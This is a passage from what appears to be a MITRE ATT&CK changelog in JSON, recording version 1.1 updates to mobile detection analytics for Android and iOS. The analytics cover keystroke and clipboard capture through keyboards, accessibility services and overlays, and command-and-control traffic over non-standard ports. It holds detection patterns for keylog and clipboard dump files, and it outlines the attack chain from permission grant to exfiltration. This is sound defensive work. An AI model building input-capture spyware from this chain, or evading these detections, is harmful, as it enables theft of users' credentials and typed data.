local write \\u2192 near-term exfil.\", \"old_value\": \"The user can view and manage installed third-party keyboards.\\nApplication vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can view and manage installed third-party keyboards.\\n-Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\\n+Defender observes an app gaining input-observation capability (AccessibilityService enablement, default IME set, draw-over-apps permission), then creating an intercept surface (overlay window, accessibility event stream consumption or IME keystroke callbacks), followed by persistence (local keylog/clipboard dump) and/or small, frequent network egress. Chain: capability/permission \\u2192 listener/overlay activation \\u2192 bursty input read events \\u2192 local write \\u2192 near-term exfil.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"android:logcat\", \"channel\": \"Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\\\\\.db|\\\\\\\\.txt|\\\\\\\\.log\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to74__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to74__0\"><a href=\"#difflib_chg_to74__top\">t</a></td><td class=\"diff_header\" id=\"from74_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;installed&nbsp;third-party&nbsp;keyboards</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to74__top\">t</a></td><td class=\"diff_header\" id=\"to74_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;gaining&nbsp;input-observation&nbsp;capabilit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;applications&nbsp;req</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;(AccessibilityService&nbsp;enablement,&nbsp;default&nbsp;IME&nbsp;set,&nbsp;draw-ov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uesting&nbsp;the&nbsp;permissions&nbsp;granting&nbsp;access&nbsp;to&nbsp;accessibility&nbsp;ser</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er-apps&nbsp;permission),&nbsp;then&nbsp;creating&nbsp;an&nbsp;intercept&nbsp;surface&nbsp;(ove</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vices&nbsp;or&nbsp;application&nbsp;overlay.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rlay&nbsp;window,&nbsp;accessibility&nbsp;event&nbsp;stream&nbsp;consumption&nbsp;or&nbsp;IME&nbsp;k</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eystroke&nbsp;callbacks),&nbsp;followed&nbsp;by&nbsp;persistence&nbsp;(local&nbsp;keylog/c</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lipboard&nbsp;dump)&nbsp;and/or&nbsp;small,&nbsp;frequent&nbsp;network&nbsp;egress.&nbsp;Chain:</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;capability/permission&nbsp;\u2192&nbsp;listener/overlay&nbsp;activation&nbsp;\u2192&nbsp;burst</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">y&nbsp;input&nbsp;read&nbsp;events&nbsp;\u2192&nbsp;local&nbsp;write&nbsp;\u2192&nbsp;near-term&nbsp;exfil.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7179bc7d-a2be-4ded-8c4f-88ec8f73e613",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:41:55.176000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0705#AN1826",
                            "external_id": "AN1826"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1826",
                    "description": "Defender observes an app enabling or using input-capture surfaces (custom keyboard extension with Full Access, abnormal UI text entry interception, pasteboard polling adjacent to login screens), then persisting and/or exfiltrating captured input. Chain: capability/consent (TCC for keyboard Full Access or input privacy domains) \u2192 intercept behavior (keyboard extension active, repeated text field \u2018editingChanged\u2019/secure entry focus, background pasteboard reads) \u2192 local write \u2192 near-term egress.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from intercept to persist/exfil (e.g., 5\u201360s)."
                        },
                        {
                            "field": "MinKeyEventBurst",
                            "description": "Minimum key/commit or editingChanged count to flag harvesting (e.g., \u226510)."
                        },
                        {
                            "field": "KeyboardFullAccessRequired",
                            "description": "Require keyboard Full Access to escalate severity (true/false)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for keylog/clipboard dump files."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good enterprise/analytics endpoints."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground state, Focus modes, MDM policy."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from intercept to persist/exfil (e.g., 5\\u201360s).\"}, {\"field\": \"MinKeyEventBurst\", \"description\": \"Minimum key/commit or editingChanged count to flag harvesting (e.g., \\u226510).\"}, {\"field\": \"KeyboardFullAccessRequired\", \"description\": \"Require keyboard Full Access to escalate severity (true/false).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for keylog/clipboard dump files.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good enterprise/analytics endpoints.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground state, Focus modes, MDM policy.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:41:55.176000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app enabling or using input-capture surfaces (custom keyboard extension with Full Access, abnormal UI text entry interception, pasteboard polling adjacent to login screens), then persisting and/or exfiltrating captured input. Chain: capability/consent (TCC for keyboard Full Access or input privacy domains) \\u2192 intercept behavior (keyboard extension active, repeated text field \\u2018editingChanged\\u2019/secure entry focus, background pasteboard reads) \\u2192 local write \\u2192 near-term egress.\", \"old_value\": \"The user can view and manage installed third-party keyboards.\\nApplication vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can view and manage installed third-party keyboards.\\n-Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.\\n+Defender observes an app enabling or using input-capture surfaces (custom keyboard extension with Full Access, abnormal UI text entry interception, pasteboard polling adjacent to login screens), then persisting and/or exfiltrating captured input. Chain: capability/consent (TCC for keyboard Full Access or input privacy domains) \\u2192 intercept behavior (keyboard extension active, repeated text field \\u2018editingChanged\\u2019/secure entry focus, background pasteboard reads) \\u2192 local write \\u2192 near-term egress.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Keyboard extension Full Access change; privacy grant touching input/keyboard categories for <bundle_id>\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to134__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to134__0\"><a href=\"#difflib_chg_to134__top\">t</a></td><td class=\"diff_header\" id=\"from134_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;and&nbsp;manage&nbsp;installed&nbsp;third-party&nbsp;keyboards</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to134__top\">t</a></td><td class=\"diff_header\" id=\"to134_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;enabling&nbsp;or&nbsp;using&nbsp;input-capture&nbsp;sur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;look&nbsp;for&nbsp;applications&nbsp;req</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">faces&nbsp;(custom&nbsp;keyboard&nbsp;extension&nbsp;with&nbsp;Full&nbsp;Access,&nbsp;abnormal&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">uesting&nbsp;the&nbsp;permissions&nbsp;granting&nbsp;access&nbsp;to&nbsp;accessibility&nbsp;ser</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">UI&nbsp;text&nbsp;entry&nbsp;interception,&nbsp;pasteboard&nbsp;polling&nbsp;adjacent&nbsp;to&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vices&nbsp;or&nbsp;application&nbsp;overlay.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ogin&nbsp;screens),&nbsp;then&nbsp;persisting&nbsp;and/or&nbsp;exfiltrating&nbsp;captured&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">input.&nbsp;Chain:&nbsp;capability/consent&nbsp;(TCC&nbsp;for&nbsp;keyboard&nbsp;Full&nbsp;Acce</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ss&nbsp;or&nbsp;input&nbsp;privacy&nbsp;domains)&nbsp;\u2192&nbsp;intercept&nbsp;behavior&nbsp;(keyboard&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">extension&nbsp;active,&nbsp;repeated&nbsp;text&nbsp;field&nbsp;\u2018editingChanged\u2019/secur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;entry&nbsp;focus,&nbsp;background&nbsp;pasteboard&nbsp;reads)&nbsp;\u2192&nbsp;local&nbsp;write&nbsp;\u2192&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">near-term&nbsp;egress.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b6ef77d6-cc8b-478c-b7f8-7767bbb58960",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-19 17:21:51.812000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0706#AN1827",
                            "external_id": "AN1827"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1827",
                    "description": "The defender correlates app-attributed outbound sessions where protocol indicators such as TLS handshake, HTTP method and header patterns, DNS semantics, or other application-layer characteristics are observed over a destination port outside the approved baseline for that protocol and app role. The strongest Android evidence is repeated or persistent app-attributed traffic using HTTPS-, HTTP-, DNS-, WebSocket-, or other recognizable application behavior over uncommon destination ports, especially when the app is backgrounded, while the device is locked, without recent user interaction, or when the app is unmanaged or not approved for that protocol-to-port pairing.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background when non-standard-port session began and no foreground transition occurred during repeated or persistent connection sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AllowedProtocolPortMappings",
                            "description": "Approved protocol-to-port pairings vary by app, business workflow, proxy architecture, and enterprise policy."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved app identities vary by organization, role, and device group."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Expected external service classes differ across app categories and enterprise mobile workflows."
                        },
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking non-standard-port sessions with lifecycle, framework, or local state changes."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close a session must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed recurrence interval for benign polling, sync, or persistent sessions differs by app type."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some apps should only initiate certain outbound communications while foregrounded."
                        },
                        {
                            "field": "EnterpriseExceptionList",
                            "description": "Known developer tools, enterprise proxies, VPNs, relays, and security products may legitimately use uncommon ports."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"AllowedProtocolPortMappings\", \"description\": \"Approved protocol-to-port pairings vary by app, business workflow, proxy architecture, and enterprise policy.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved app identities vary by organization, role, and device group.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Expected external service classes differ across app categories and enterprise mobile workflows.\"}, {\"field\": \"TimeWindow\", \"description\": \"Correlation window linking non-standard-port sessions with lifecycle, framework, or local state changes.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close a session must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed recurrence interval for benign polling, sync, or persistent sessions differs by app type.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some apps should only initiate certain outbound communications while foregrounded.\"}, {\"field\": \"EnterpriseExceptionList\", \"description\": \"Known developer tools, enterprise proxies, VPNs, relays, and security products may legitimately use uncommon ports.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-19 17:21:51.812000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates app-attributed outbound sessions where protocol indicators such as TLS handshake, HTTP method and header patterns, DNS semantics, or other application-layer characteristics are observed over a destination port outside the approved baseline for that protocol and app role. The strongest Android evidence is repeated or persistent app-attributed traffic using HTTPS-, HTTP-, DNS-, WebSocket-, or other recognizable application behavior over uncommon destination ports, especially when the app is backgrounded, while the device is locked, without recent user interaction, or when the app is unmanaged or not approved for that protocol-to-port pairing.\", \"old_value\": \"Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.\\nApplication vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.\\n-Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. \\n+The defender correlates app-attributed outbound sessions where protocol indicators such as TLS handshake, HTTP method and header patterns, DNS semantics, or other application-layer characteristics are observed over a destination port outside the approved baseline for that protocol and app role. The strongest Android evidence is repeated or persistent app-attributed traffic using HTTPS-, HTTP-, DNS-, WebSocket-, or other recognizable application behavior over uncommon destination ports, especially when the app is backgrounded, while the device is locked, without recent user interaction, or when the app is unmanaged or not approved for that protocol-to-port pairing.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"AppState=background when non-standard-port session began and no foreground transition occurred during repeated or persistent connection sequence\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"DeviceLockState=locked during outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_source_references'][5]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_source_references'][6]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_source_references'][7]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"App identity using non-standard protocol-to-port pairing was unmanaged, outside approved app baseline, or not permitted to communicate using detected protocol/service over observed destination port\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to131__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to131__0\"><a href=\"#difflib_chg_to131__top\">t</a></td><td class=\"diff_header\" id=\"from131_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;properly&nbsp;configured&nbsp;firewalls&nbsp;may&nbsp;also&nbsp;naturally&nbsp;block&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to131__top\">t</a></td><td class=\"diff_header\" id=\"to131_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;app-attributed&nbsp;outbound&nbsp;sessions&nbsp;whe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">command&nbsp;and&nbsp;control&nbsp;traffic&nbsp;over&nbsp;non-standard&nbsp;ports.&nbsp;Applica</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">re&nbsp;protocol&nbsp;indicators&nbsp;such&nbsp;as&nbsp;TLS&nbsp;handshake,&nbsp;HTTP&nbsp;method&nbsp;an</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 